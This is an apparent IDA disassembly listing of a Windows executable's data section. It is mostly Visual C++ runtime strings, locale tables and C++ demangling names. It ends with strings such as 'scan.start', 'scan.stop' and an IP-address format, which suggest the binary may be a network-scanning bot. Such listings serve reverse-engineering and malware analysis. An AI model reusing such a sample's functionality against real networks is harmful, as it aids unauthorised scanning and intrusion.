aUnicode db 'UNICODE',0 ; DATA XREF: __openfile:loc_408419�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_423C04�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+157�o
align 10h
; char asc_41DB10[]
asc_41DB10 db 0Ah ; DATA XREF: __NMSG_WRITE:loc_409BC4�o
db 0Ah,0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+E8�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+A3�o
align 10h
; char Src[]
Src db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+5B�o
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBB8 dd 6E6174h ; DATA XREF: ___libm_error_support:$LN2�o
dword_41DBBC dd 736F63h ; DATA XREF: ___libm_error_support:$LN4�o
dword_41DBC0 dd 6E6973h ; DATA XREF: ___libm_error_support:$LN6_0�o
aModf db 'modf',0 ; DATA XREF: ___libm_error_support:$LN12_3�o
align 4
aFloor db 'floor',0 ; DATA XREF: ___libm_error_support:$LN16_2�o
align 4
aCeil db 'ceil',0 ; DATA XREF: ___libm_error_support:$LN18_3�o
align 4
aAtan db 'atan',0 ; DATA XREF: ___libm_error_support:$LN20_3�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: ___libm_error_support+1BF�o
align 10h
dbl_41DBF0 dq 1.0 ; DATA XREF: __floor_default+6D�r
aAcos db 'acos',0 ; DATA XREF: ___libm_error_support:$LN30�o
align 10h
aAsin db 'asin',0 ; DATA XREF: ___libm_error_support:$LN8_3�o
align 4
aLog db 'log',0 ; DATA XREF: ___libm_error_support:loc_40A568�o
; ___libm_error_support+149�o ...
aLog10 db 'log10',0 ; DATA XREF: ___libm_error_support:loc_40A541�o
; ___libm_error_support+131�o ...
align 4
aExp db 'exp',0 ; DATA XREF: ___libm_error_support:loc_40A508�o
; ___libm_error_support+10D�o ...
aPow db 'pow',0 ; DATA XREF: ___libm_error_support:loc_40A4D3�o
; ___libm_error_support:loc_40A580�o ...
off_41DC1C dd offset ___DestructExceptionObject ; DATA XREF: __except_handler4+F1�r
; __except_handler4+FA�o ...
dd offset dword_420E34
off_41DC24 dd offset sub_40B1DA ; DATA XREF: sub_40B1CF�o sub_40B1DA+3�o ...
dd offset unknown_libname_7 ; Microsoft VisualC 2-8/net runtime
aBadException db 'bad exception',0 ; DATA XREF: unknown_libname_104+156�o
align 4
dword_41DC3C dd 41h dup(0) ; DATA XREF: unknown_libname_111+25�o
; __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+27�o
asc_41DD40: ; DATA XREF: .data:off_423668�o
; .data:00423E70�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF40 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00423E74�o
; .data:00423590�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E148 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00423F1C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:00423F18�o
align 4
aPm db 'PM',0 ; DATA XREF: .data:00423F14�o
align 4
aAm db 'AM',0 ; DATA XREF: .data:00423F10�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:00423F0C�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:00423F08�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:00423F04�o
aSeptember db 'September',0 ; DATA XREF: .data:00423F00�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:00423EFC�o
align 10h
aJuly db 'July',0 ; DATA XREF: .data:00423EF8�o
align 4
aJune db 'June',0 ; DATA XREF: .data:00423EF4�o
align 10h
aApril db 'April',0 ; DATA XREF: .data:00423EEC�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:00423EE8�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:00423EE4�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00423EE0�o
aDec db 'Dec',0 ; DATA XREF: .data:00423EDC�o
aNov db 'Nov',0 ; DATA XREF: .data:00423ED8�o
aOct db 'Oct',0 ; DATA XREF: .data:00423ED4�o
aSep db 'Sep',0 ; DATA XREF: .data:00423ED0�o
aAug db 'Aug',0 ; DATA XREF: .data:00423ECC�o
aJul db 'Jul',0 ; DATA XREF: .data:00423EC8�o
aJun db 'Jun',0 ; DATA XREF: .data:00423EC4�o
aMay db 'May',0 ; DATA XREF: .data:00423EC0�o
; .data:00423EF0�o
aApr db 'Apr',0 ; DATA XREF: .data:00423EBC�o
aMar db 'Mar',0 ; DATA XREF: .data:00423EB8�o
aFeb db 'Feb',0 ; DATA XREF: .data:00423EB4�o
aJan db 'Jan',0 ; DATA XREF: .data:00423EB0�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00423EAC�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:00423EA8�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:00423EA4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00423EA0�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00423E9C�o
aMonday db 'Monday',0 ; DATA XREF: .data:00423E98�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:00423E94�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00423E90�o
aFri db 'Fri',0 ; DATA XREF: .data:00423E8C�o
aThu db 'Thu',0 ; DATA XREF: .data:00423E88�o
aWed db 'Wed',0 ; DATA XREF: .data:00423E84�o
aTue db 'Tue',0 ; DATA XREF: .data:00423E80�o
aMon db 'Mon',0 ; DATA XREF: .data:00423E7C�o
aSun db 'Sun',0 ; DATA XREF: .data:off_423E78�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
; DATA XREF: ___crtInitCritSecAndSpinCount+53�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: ___crtInitCritSecAndSpinCount+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: .rdata:0041EB84�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: .rdata:0041EB80�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: .rdata:0041EB7C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: .rdata:0041EB78�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: .rdata:0041EB74�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: .rdata:0041ECC0�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECBC�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECB8�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: .rdata:0041ECB4�o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: .rdata:0041ECB0�o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: .rdata:0041ECAC�o
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECA8�o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECA4�o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041ECA0�o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: .rdata:0041EC9C�o
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: .rdata:0041EC98�o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: .rdata:0041EC94�o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: .rdata:0041EC90�o
align 4
aDelete db ' delete[]',0 ; DATA XREF: .rdata:0041EC8C�o
align 10h
aNew db ' new[]',0 ; DATA XREF: .rdata:0041EC88�o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0 ; DATA XREF: .rdata:0041EC84�o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: .rdata:0041EC80�o
aRtti db '`RTTI',0 ; DATA XREF: .rdata:0041EC7C�o
align 4
aEh db '`EH',0 ; DATA XREF: .rdata:0041EC78�o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: .rdata:0041EC74�o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: .rdata:0041EC70�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: .rdata:0041EC6C�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041EC68�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC64�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: .rdata:0041EC60�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC5C�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041EC58�o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC54�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: .rdata:0041EC50�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: .rdata:0041EC4C�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: .rdata:0041EC48�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: .rdata:0041EC44�o
align 4
aString db '`string',27h,0 ; DATA XREF: .rdata:0041EC40�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: .rdata:0041EC3C�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: .rdata:0041EC38�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: .rdata:0041EC34�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: .rdata:0041EC30�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: .rdata:0041EC2C�o
align 4
asc_41EA24 db '^=',0 ; DATA XREF: .rdata:0041EC28�o
align 4
asc_41EA28 db '|=',0 ; DATA XREF: .rdata:0041EC24�o
align 4
asc_41EA2C db '&=',0 ; DATA XREF: .rdata:0041EC20�o
align 10h
asc_41EA30 db '<<=',0 ; DATA XREF: .rdata:0041EC1C�o
asc_41EA34 db '>>=',0 ; DATA XREF: .rdata:0041EC18�o
asc_41EA38 db '%=',0 ; DATA XREF: .rdata:0041EC14�o
align 4
asc_41EA3C db '/=',0 ; DATA XREF: .rdata:0041EC10�o
align 10h
asc_41EA40 db '-=',0 ; DATA XREF: .rdata:0041EC0C�o
align 4
asc_41EA44 db '+=',0 ; DATA XREF: .rdata:0041EC08�o
align 4
asc_41EA48 db '*=',0 ; DATA XREF: .rdata:0041EC04�o
align 4
asc_41EA4C db '||',0 ; DATA XREF: .rdata:0041EC00�o
align 10h
asc_41EA50 db '&&',0 ; DATA XREF: .rdata:0041EBFC�o
align 4
asc_41EA54: ; DATA XREF: .rdata:0041EBF8�o
unicode 0, <|>,0
asc_41EA58: ; DATA XREF: .rdata:0041EBF4�o
unicode 0, <^>,0
asc_41EA5C: ; DATA XREF: .rdata:0041EBF0�o
unicode 0, <~>,0
asc_41EA60 db '()',0 ; DATA XREF: .rdata:0041EBEC�o
align 4
asc_41EA64: ; DATA XREF: .rdata:0041EBE8�o
unicode 0, <,>,0
asc_41EA68 db '>=',0 ; DATA XREF: .rdata:0041EBE4�o
align 4
asc_41EA6C: ; DATA XREF: .rdata:0041EBE0�o
dw 3Eh
unicode 0, <>,0
asc_41EA70 db '<=',0 ; DATA XREF: .rdata:0041EBDC�o
align 4
asc_41EA74: ; DATA XREF: .rdata:0041EBD8�o
dw 3Ch
unicode 0, <>,0
asc_41EA78: ; DATA XREF: .rdata:0041EBD4�o
unicode 0, <%>,0
asc_41EA7C: ; DATA XREF: .rdata:0041EBD0�o
unicode 0, </>,0
asc_41EA80 db '->*',0 ; DATA XREF: .rdata:0041EBCC�o
asc_41EA84: ; DATA XREF: .rdata:0041EBC8�o
unicode 0, <&>,0
asc_41EA88: ; DATA XREF: .rdata:0041EBC4�o
unicode 0, <+>,0
asc_41EA8C: ; DATA XREF: .rdata:0041EBC0�o
unicode 0, <->,0
asc_41EA90 db '--',0 ; DATA XREF: .rdata:0041EBBC�o
align 4
asc_41EA94 db '++',0 ; DATA XREF: .rdata:0041EBB8�o
align 4
asc_41EA98: ; DATA XREF: .rdata:0041EBB4�o
unicode 0, <*>,0
asc_41EA9C db '->',0 ; DATA XREF: .rdata:0041EBB0�o
align 10h
aOperator db 'operator',0 ; DATA XREF: .rdata:0041EBAC�o
align 4
asc_41EAAC db '[]',0 ; DATA XREF: .rdata:0041EBA8�o
align 10h
asc_41EAB0 db '!=',0 ; DATA XREF: .rdata:0041EBA4�o
align 4
asc_41EAB4 db '==',0 ; DATA XREF: .rdata:0041EBA0�o
align 4
asc_41EAB8: ; DATA XREF: .rdata:0041EB9C�o
unicode 0, <!>,0
asc_41EABC db '<<',0 ; DATA XREF: .rdata:0041EB98�o
align 10h
asc_41EAC0 db '>>',0 ; DATA XREF: .rdata:0041EB94�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: .rdata:0041EB8C�o
aNew_0 db ' new',0 ; DATA XREF: .rdata:0041EB88�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: .rdata:0041EB6C�o
a__restrict db '__restrict',0 ; DATA XREF: .rdata:0041EB68�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: .rdata:0041EB64�o
a__clrcall db '__clrcall',0 ; DATA XREF: .rdata:0041EB60�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: .rdata:0041EB5C�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: .rdata:0041EB58�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: .rdata:0041EB54�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: .rdata:0041EB50�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: .rdata:0041EB4C�o
a__based db '__based(',0 ; DATA XREF: .rdata:0041EB48�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D482
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset byte_41D480
dd offset asc_41EAC0 ; ">>"
dd offset asc_41EABC ; "<<"
dd offset asc_41EAB8 ; "!"
dd offset asc_41EAB4 ; "=="
dd offset asc_41EAB0 ; "!="
dd offset asc_41EAAC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EA9C ; "->"
dd offset asc_41EA98 ; "*"
dd offset asc_41EA94 ; "++"
dd offset asc_41EA90 ; "--"
dd offset asc_41EA8C ; "-"
dd offset asc_41EA88 ; "+"
dd offset asc_41EA84 ; "&"
dd offset asc_41EA80 ; "->*"
dd offset asc_41EA7C ; "/"
dd offset asc_41EA78 ; "%"
dd offset asc_41EA74 ; "<"
dd offset asc_41EA70 ; "<="
dd offset asc_41EA6C ; ">"
dd offset asc_41EA68 ; ">="
dd offset asc_41EA64 ; ","
dd offset asc_41EA60 ; "()"
dd offset asc_41EA5C ; "~"
dd offset asc_41EA58 ; "^"
dd offset asc_41EA54 ; "|"
dd offset asc_41EA50 ; "&&"
dd offset asc_41EA4C ; "||"
dd offset asc_41EA48 ; "*="
dd offset asc_41EA44 ; "+="
dd offset asc_41EA40 ; "-="
dd offset asc_41EA3C ; "/="
dd offset asc_41EA38 ; "%="
dd offset asc_41EA34 ; ">>="
dd offset asc_41EA30 ; "<<="
dd offset asc_41EA2C ; "&="
dd offset asc_41EA28 ; "|="
dd offset asc_41EA24 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset aEh ; "`EH"
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D482
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F524+C1�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F524+A9�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F524+6D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F524+58�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F524+46�o
aUser32_dll db 'USER32.DLL',0 ; DATA XREF: sub_40F524+28�o
align 4
off_41ED94 dd offset __fpmath ; DATA XREF: __cinit�r __cinit+9�o ...
dd offset nullsub_1
dd offset nullsub_1
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE18 dq 0.0 ; DATA XREF: __handle_exc+143�r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe2_l:loc_410B2C�o
align 4
dbl_41EE68 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_41EE70 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: ___initconout+E�o
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_412BE0�o
align 10h
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+103�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+F4�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+DC�o
align 4
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: .data:00424520�o
align 4
; char aScan_start[]
aScan_start db 'scan.start',0 ; DATA XREF: sub_41C370+D5�o
align 4
; char aScan_stop[]
aScan_stop db 'scan.stop',0 ; DATA XREF: sub_41C370+F1�o
byte_41EEEE db 0 ; DATA XREF: sub_41A9DE+9C�o
byte_41EEEF db 0 ; DATA XREF: sub_41A9DE+A8�o
; char aScan_stats[]
aScan_stats db 'scan.stats',0 ; DATA XREF: sub_41C370+10D�o
align 4
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_413A2D+4A�o
; char aS_0[]
